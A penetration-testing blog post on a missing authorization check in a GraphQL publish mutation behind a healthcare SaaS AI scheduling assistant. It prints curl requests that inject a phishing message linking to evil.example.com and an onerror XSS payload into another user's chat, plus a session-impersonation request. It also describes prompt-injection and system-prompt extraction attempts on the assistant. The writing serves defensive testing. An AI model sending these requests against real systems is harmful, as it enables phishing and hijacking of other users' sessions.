AI chat features are being bolted onto existing SaaS products at a pace the security guidance hasn't caught up with. The testing advice that's out there - OWASP LLM Top 10, academic prompt injection research, vendor guidance - focuses almost entirely on the language model itself. What almost nobody talks about is the transport layer underneath: the GraphQL mutations, WebSocket subscriptions, and publish/subscribe channels that actually carry the messages between the AI backend, the user's browser, and whatever downstream systems the assistant touches.
On a recent continuous penetration test against a healthcare SaaS platform, we spent a day pulling apart the AI scheduling assistant built into their flagship product. The assistant runs on AWS AppSync with a React frontend and uses the ag-ui protocol for streaming messages back to the client. We tested prompt injection, HTML injection, and system prompt extraction - the standard LLM safety checks. All of it was deflected. What actually broke was the classical API layer: the publish mutations that the AI backend uses to stream responses to the client were exposed in the client-facing GraphQL schema and accepted any sessionGuid from any authenticated user.
That's the pattern this post is about. Prompt injection testing matters, but it's only half the surface. The other half is classical API authorization - in this case, a Broken Object Level Authorization (BOLA) hole in how publish/subscribe infrastructure gets exposed to client traffic.
Key Takeaways
- AI chat features built on GraphQL publish/subscribe infrastructure (AWS AppSync, Hasura, Apollo Federation) often expose the publish mutation in the client-facing schema, turning a server-to-client broadcast channel into a writable endpoint any authenticated user can call.
- The vulnerability class is a BOLA on the sessionGuid parameter, also referred to as Insecure Direct Object Reference (IDOR). If the server doesn't verify the caller owns the session before publishing, any authenticated user can inject content into any session - identical to Zendesk's 2025 chat IDOR and HackerOne's Copilot DestroyLlmConversation IDOR.
- Testing AI chat features requires classical API authorization testing on the transport layer, not just LLM safety tests. A well-scoped system prompt can deflect prompt injection while the GraphQL mutation underneath has no authorization at all.
- Session identifiers used as authorization tokens fail when they leak through logs, monitoring, subscription broadcasts, or adjacent info disclosures. UUIDv4 session GUIDs are not predictable, but practical exploitation rarely requires prediction.
- React's JSX output escaping blocked XSS through the chat's chatResponse field. The server accepted <script> and <img onerror> tags, but the frontend rendered them as text. Frontend sanitization does not excuse missing server-side authorization - the payload was still delivered.
- OWASP LLM Top 10 2025 frames excessive agency (LLM06) and improper output handling (LLM05) but stops at the model boundary. The API authorization layer that carries LLM output to the client is not in the framework and is rarely tested.
Where AI Chat Security Testing Misses the Mark
The dominant framework for AI chat security is the OWASP Top 10 for LLM Applications. Its entries - prompt injection, insecure output handling, excessive agency, system prompt leakage - are model-layer concerns. They assume the LLM is the interesting target and the infrastructure delivering its output is either trusted or out of scope. And in some cases that’s true.
In practice, the infrastructure is where the bugs are. When a product team adds an AI assistant to an existing SaaS application, they typically wire a language model into the existing API. The LLM runs server-side, streams tokens back to the client through a publish/subscribe channel, and either the backend or the client translates the streamed content into UI updates. That publish channel is the attack surface nobody tests.
The healthcare SaaS platform we tested used AWS AppSync with a standard pattern: a mutation called publishAGUIMessageChunk that takes a sessionGuid and a JSON message payload, and pushes the payload to subscribers of the AGUIMessages subscription filtered by sessionGuid. The AGUI prefix refers to the ag-ui protocol, a generic agent UI framework designed for this exact streaming pattern. It’s a reasonable technical choice. The problem is how the mutation ends up in the schema.
The publish mutation exists so the server-side AI backend can write into the subscription stream that clients consume. It's meant to be called by internal services, not the client. But because it lives in the same AppSync GraphQL schema as the client-facing API, and because AppSync authorization is typically enforced per-mutation through resolver-level checks rather than through schema separation, the mutation is callable by anyone with a valid tenant JWT. If no resolver-level check validates that the caller owns the session, any authenticated user can publish into any session.
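The missing control is an ownership check in the resolver before anything is published. Below is a minimal sketch of what that check looks like, written as one function in an APPSYNC_JS pipeline resolver - the DynamoDB-backed session table, its key and attribute names, and the identity claim are assumptions for illustration, not the platform's actual code:

// Pipeline resolver function for Mutation.publishAGUIMessageChunk (APPSYNC_JS runtime).
// Assumes sessions live in a DynamoDB table keyed by sessionGuid with a userGuid attribute.
import { util } from '@aws-appsync/utils';

export function request(ctx) {
  // Fetch the session record for the sessionGuid the caller wants to publish into.
  return {
    operation: 'GetItem',
    key: util.dynamodb.toMapValues({ sessionGuid: ctx.args.sessionGuid }),
  };
}

export function response(ctx) {
  const session = ctx.result;
  // Reject publishes to sessions that don't exist or aren't owned by the caller.
  if (!session || session.userGuid !== ctx.identity.sub) {
    util.unauthorized();
  }
  // Ownership confirmed; pass the arguments on to the publish step of the pipeline.
  return ctx.args;
}

The same pattern applies on Hasura or Apollo: load the session, compare its owner to the verified caller identity, and refuse before anything is written to the stream.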
How We Found the BOLA
The discovery came from GraphQL introspection. Before we touched the AI features, we pulled the complete mutation list and filtered for anything related to chat, session, or message:
curl -s -X POST 'https://api.example.com/graphql' \
  -H "Authorization: $TOKEN" \
  -H "tenant-id: $TENANT" \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __type(name: \"Mutation\") { fields { name args { name type { name } } } } }"}' \
  | jq '.data.__type.fields[] | select(.name | test("chat|session|message|agui|scheduler"; "i"))'
The output included the expected client-facing mutations (initializeChatInfo, sendChatMessage) alongside two that stood out: publishAGUIMessage and publishAGUIMessageChunk. Both accepted a sessionGuid as a top-level argument. Neither corresponded to anything the client would normally call - the client subscribes to the message stream, it doesn't publish into it.
Testing cross-user authorization on publishAGUIMessageChunk was straightforward. We obtained a victim's active session GUID from a second browser session and published a message from the attacker's terminal:
curl -s -X POST 'https://api.example.com/graphql' \
  -H "Authorization: $ATTACKER_TOKEN" \
  -H "tenant-id: $TENANT" \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation { publishAGUIMessageChunk(sessionGuid: \"<VICTIM_SESSION_GUID>\", message: \"{\\\"type\\\": \\\"CUSTOM\\\", \\\"name\\\": \\\"final_state\\\", \\\"value\\\": {\\\"response\\\": {\\\"chatResponse\\\": \\\"URGENT: Your session has expired. Re-authenticate at https://evil.example.com.\\\", \\\"status\\\": \\\"active\\\", \\\"quickReply\\\": [\\\"Re-authenticate now\\\"]}}}\") { sessionGuid message } }"}'
The API returned success. The message payload used the same JSON structure the AI's backend produces, so if delivered and rendered, it would appear in the chat UI as a legitimate AI response with functional quick reply buttons.
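For readability, the message argument in that request decodes to:

{
  "type": "CUSTOM",
  "name": "final_state",
  "value": {
    "response": {
      "chatResponse": "URGENT: Your session has expired. Re-authenticate at https://evil.example.com.",
      "status": "active",
      "quickReply": ["Re-authenticate now"]
    }
  }
}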
To confirm the authorization check was missing entirely rather than just misconfigured, we published to a fabricated session GUID that didn't exist:
curl ... -d '{"query":"mutation { publishAGUIMessageChunk(sessionGuid: \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\", message: \"test\") { sessionGuid message } }"}'
Success. The fabricated GUID was echoed back. There is no server-side check that the session exists, let alone that the caller owns it. The attacker account used for these tests held only low-privilege scheduling roles - no admin, no AI permissions, no clinical access.
What Prompt Injection Testing Got Right and Wrong
Before finding the BOLA, we ran the prompt injection playbook against the AI. The system prompt was well-scoped: the assistant only handles appointment scheduling. When we asked it to dump its system prompt, list its tools, or ignore previous instructions, it responded with polite deflections back to scheduling tasks.
I appreciate you reaching out! I'm here specifically to help you schedule
appointments. It looks like you might be testing the system, but I'm
focused on helping with real scheduling needs. Would you like to book
an appointment today?
We tried every variation - role-play framing, system-tag prefixes, indirect instructions embedded in natural-language requests - and the assistant consistently refused to break scope. Direct prompt injection was not exploitable.
Indirect prompt injection was also not exploitable, but for a more interesting reason. The intuitive attack was to inject content into the session through the publish BOLA, then call sendChatMessage and watch the LLM read the injected content from its conversation history. That failed. The publish channel and the AI's conversation store are separate. publishAGUIMessageChunk writes into the subscription stream that the client consumes, but the LLM's conversation history is maintained server-side and populated only from the sendChatMessage chatText field. Injecting into the publish channel does not influence the model's subsequent responses.
This is a good security boundary. Whether by accident or design, the product team separated the publish channel from the conversation state, which prevented the BOLA from chaining into prompt injection. It is also a reminder that LLM safety and API authorization are independent problems. The system prompt did its job. The GraphQL schema did not.
What React's Output Escaping Prevented
The payload we were injecting landed in chatResponse - a field the frontend renders as message text. We tested whether it would also render as HTML:
curl ... -d '{"query":"mutation { publishAGUIMessageChunk(sessionGuid: \"<VICTIM_SESSION_GUID>\", message: \"{\\\"type\\\": \\\"CUSTOM\\\", \\\"value\\\": {\\\"response\\\": {\\\"chatResponse\\\": \\\"<img src=x onerror=alert(document.domain)>\\\"}}}\") { sessionGuid message } }"}'
The API accepted the payload, but the React frontend rendered the content as literal text rather than HTML. JSX output escaping is on by default and the developers had not opted into dangerouslySetInnerHTML on this field. SVG onload, javascript: URI markdown links, and script tags all behaved the same way: delivered over the wire, escaped in the DOM.
This result is worth stating clearly. The server accepted an XSS payload and happily broadcast it through the publish channel. The reason there is no stored XSS here is that the frontend happens to escape output by default. A single future change - swapping the renderer for a markdown library, adding dangerouslySetInnerHTML to support richer AI responses, or migrating to a different framework - reintroduces the XSS. The server-side authorization bug is independent and remains exploitable regardless of what the frontend does with the data.
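To make the distinction concrete, here is a hypothetical rendering component in each state - component and prop names are illustrative, not the platform's actual frontend code:

// Default JSX interpolation: the injected payload is escaped and shows up as literal text.
function ChatMessage({ chatResponse }: { chatResponse: string }) {
  return <div className="chat-bubble">{chatResponse}</div>;
}

// One "support richer AI responses" change later, the same BOLA becomes stored XSS:
function RichChatMessage({ chatResponse }: { chatResponse: string }) {
  return <div className="chat-bubble" dangerouslySetInnerHTML={{ __html: chatResponse }} />;
}

The difference between the two is a one-line diff, which is why the server-side authorization check has to be the control that holds.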
This is also a concrete argument against trusting defense-in-depth claims that rely on the frontend. The server should reject unauthorized publishes. React escaping should be a backup, not the primary control.
The initializeChatInfo User Impersonation Companion Bug
The initializeChatInfo mutation has its own authorization gap. It accepts a client-supplied userGuid as the session owner without validating it against the caller's JWT sub claim:
curl -s -X POST 'https://api.example.com/graphql' \
  -H "Authorization: $ATTACKER_TOKEN" \
  -H "tenant-id: $TENANT" \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation { initializeChatInfo(input: { userGuid: \"<VICTIM_USER_GUID>\", locationGuid: \"<LOC>\", personGuid: \"<PERSON>\", providerGuid: \"<PROVIDER>\" }) { sessionGuid chatResponse } }"}'
The server returns a fresh sessionGuid bound to the victim user, not the caller. This creates a session on the victim's behalf. The victim never sees this session - when they log in and open the chat, the frontend creates its own session with its own GUID, and the impersonated session is orphaned. It's still a real bug (the JWT is not authoritative over the session owner, which is a backend data integrity issue), but it does not directly enable the injection path most people would assume.
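The missing check is small. A sketch of its shape with illustrative names - in practice the comparison may go through a user-mapping lookup rather than a direct equality against the JWT sub claim:

// Reject session creation on behalf of anyone other than the authenticated caller.
// identity.sub comes from the verified JWT; input.userGuid is client-supplied and untrusted.
function assertSessionOwner(input: { userGuid: string }, identity: { sub: string }): void {
  if (input.userGuid !== identity.sub) {
    throw new Error('Unauthorized: userGuid must match the authenticated user');
  }
}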
This is the kind of nuance that matters in AI chat testing. An API surface can have multiple authorization bugs that interact in non-obvious ways, and the "obvious" attack chain may not work. Testing the full cross-product requires attacking each endpoint independently, then looking for ways to chain them.
Why Session GUIDs Fail as Authorization Tokens
The practical constraint on the publish BOLA is that exploiting it requires the victim's active sessionGuid. The value is a UUIDv4 and is not returned by any query we could find through the client-facing schema - no way to list other users' sessions, no directory of active chats, no way to iterate. We verified this by introspecting every query that returned session-shaped data.
But session GUIDs leak through other channels. A few to check on any engagement:
- WebSocket subscription traffic. If the AGUIMessages subscription broadcasts to all connected clients rather than filtering server-side by sessionGuid, the session GUIDs of concurrent users appear in any attacker's WebSocket history.
- Log aggregation. CloudWatch, Datadog, Sentry - any monitoring pipeline that captures request/response bodies or WebSocket frames stores session GUIDs. An attacker with read access to observability data does not need to guess.
- Adjacent API endpoints. Audit logs, support tools, admin panels. Anywhere a support engineer might look up a user's session for troubleshooting is a potential leak source.
- Insider network visibility. A malicious employee on the corporate network can often observe other employees' traffic enough to pull out session identifiers.
Treating session GUIDs as if they were credentials works only if the surface area around the session GUID is small and tightly controlled. In a real production system, the surface is never that small. The authorization check at the publish layer is the only reliable control.
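Checking the first of those leak sources is mechanical: subscribe from the attacker's account and watch whose session GUIDs arrive. A minimal sketch using the graphql-ws client - AppSync's real-time endpoint speaks its own protocol rather than graphql-ws, so the transport setup differs there, and the subscription field names here are illustrative; take the real shape from introspection:

import { createClient } from 'graphql-ws';

// Connect as the low-privilege attacker account.
const client = createClient({
  url: 'wss://api.example.com/graphql',
  connectionParams: { Authorization: process.env.ATTACKER_TOKEN },
});

client.subscribe(
  // Subscribing without a sessionGuid filter tests whether filtering is enforced server-side.
  { query: 'subscription { AGUIMessages { sessionGuid message } }' },
  {
    next: (event) => {
      // If sessionGuids belonging to other users show up here, the server-side filter
      // is missing and the publish BOLA becomes practically exploitable at scale.
      console.log(JSON.stringify(event));
    },
    error: (err) => console.error(err),
    complete: () => {},
  },
);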
How This Compares to Zendesk, HackerOne Copilot, and Other Public Disclosures
The bug class is not novel. Well-documented precedents:
- Zendesk Chat IDOR (2025) - a high-severity IDOR in the Zendesk chat API's POST /sc/sdk/v2/apps/[APP_ID]/conversations/[CONVERSATION_ID]/messages endpoint allowed unauthorized message injection into another user's chat. The root cause is identical: the conversation identifier functioned as an authorization token with no ownership check. See Reco Security Labs coverage.
- HackerOne Copilot IDOR - the DestroyLlmConversation GraphQL mutation in HackerOne's unreleased Copilot feature was vulnerable to IDOR on the conversation ID. A GraphQL mutation, an AI chat feature, missing authorization on the identifier. See HackerOne Report #2218334.
- AI chatbot IDOR plus prompt injection (2025) - a researcher combined IDOR with prompt injection on an e-commerce AI chatbot to access thousands of customer records. Disclosed in this Medium writeup.
- Third-party AI chatbot plugin research (IEEE S&P 2026) - a large-scale study of 17 third-party plugins found 8 that transmitted message history in POST payloads without authentication or integrity checks. See the preprint on arXiv.
Add our finding to the list and the pattern is clear. AI chat features built on any publish/subscribe GraphQL infrastructure need BOLA testing on the identifiers that carry authorization. Product teams that focus LLM security reviews exclusively on the model layer keep missing this bug class.
A Testing Methodology for AI Chat Features
For any engagement involving an AI chat, assistant, or copilot feature, run the following in parallel with prompt injection testing. This is the methodology that would have found this bug on day one:
- Introspect the full GraphQL schema. Pull every mutation, query, and subscription. Filter for anything that mentions chat, session, message, agent, agui, conversation, copilot, or assistant. Publish/subscribe mutations designed for server-to-client broadcast should not appear in the client-facing schema.
- Test BOLA on every identifier in chat-related mutations. For each mutation that takes a session, conversation, or message identifier, try the attacker's token with a victim's identifier, then with a fabricated identifier. Both should fail. If either succeeds, you have a BOLA (a minimal harness for this step is sketched after this list).
- Test cross-user session creation. Mutations like initializeChatInfo that accept userGuid parameters should reject values that don't match the caller's JWT claim. If they don't, document the impersonation even if it doesn't chain cleanly.
- Test XSS through message fields. Inject <img onerror>, SVG onload, and markdown with javascript: URIs into the content that renders as AI output. Test in the actual browser UI - the server accepting the payload is only half the test.
- Test prompt injection through injected content. If you can inject into the conversation store (not just the publish channel), prompt injection becomes indirect. Send a follow-up sendChatMessage after injection and see whether the AI's response references the injected content.
- Trace session GUID discoverability. Can the attacker's subscription receive another user's GUIDs? Are session GUIDs in URLs, logs, error messages, or support tools? Document the sources - this determines practical exploitability of any BOLA.
- Document negative results. Failed prompt injection attempts, filtered XSS, and unreachable chains are evidence too. They narrow the finding to its true shape instead of overselling it.
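As a worked example of the second step, here is a minimal harness against the publish mutation from this engagement - the endpoint, headers, and argument types are assumptions based on the requests above, so adapt them to the target schema:

// Try the attacker's token against a victim-owned and a fabricated sessionGuid.
// Both publishes should be rejected; if either succeeds, you have a BOLA.
const ENDPOINT = 'https://api.example.com/graphql';

async function tryPublish(token: string, tenant: string, sessionGuid: string): Promise<boolean> {
  const query = `mutation ($sessionGuid: String!, $message: String!) {
    publishAGUIMessageChunk(sessionGuid: $sessionGuid, message: $message) { sessionGuid }
  }`;
  const res = await fetch(ENDPOINT, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', Authorization: token, 'tenant-id': tenant },
    body: JSON.stringify({ query, variables: { sessionGuid, message: 'authz-probe' } }),
  });
  const body = await res.json();
  return !body.errors; // true = the API accepted the publish
}

const token = process.env.ATTACKER_TOKEN!;
const tenant = process.env.TENANT!;
console.log('victim session accepted:', await tryPublish(token, tenant, '<VICTIM_SESSION_GUID>'));
console.log('fabricated session accepted:', await tryPublish(token, tenant, 'aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee'));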
Conclusion
The security conversation around AI chat features is dominated by the LLM layer - prompt injection, system prompt leakage, model jailbreaks. All of that matters. But it is not a substitute for the classical API authorization testing that should run alongside it. On this engagement, the system prompt successfully deflected every prompt injection attempt we threw at it, and the most impactful bug was still a missing resolver-level check on a GraphQL mutation that was never meant to be client-facing.
Continuous penetration testing caught this because we had time to introspect the full schema and build a methodology that looked past the model. A traditional time-boxed pentest focused on the interesting AI features would have walked away with a prompt injection negative result and called the LLM well-secured. The publish BOLA would have survived.
If your product has added AI chat features on top of an existing GraphQL API, introspect the schema, audit every chat-related mutation for missing authorization, and assume the real bug is in the infrastructure the model is running on. The LLM is the new thing. The bug class is not.
Sprocket Security's continuous penetration testing covers AI-assisted features the same way we cover everything else - full introspection, independent testing of every surface, and the time to follow the non-obvious paths. Learn more about our continuous testing model.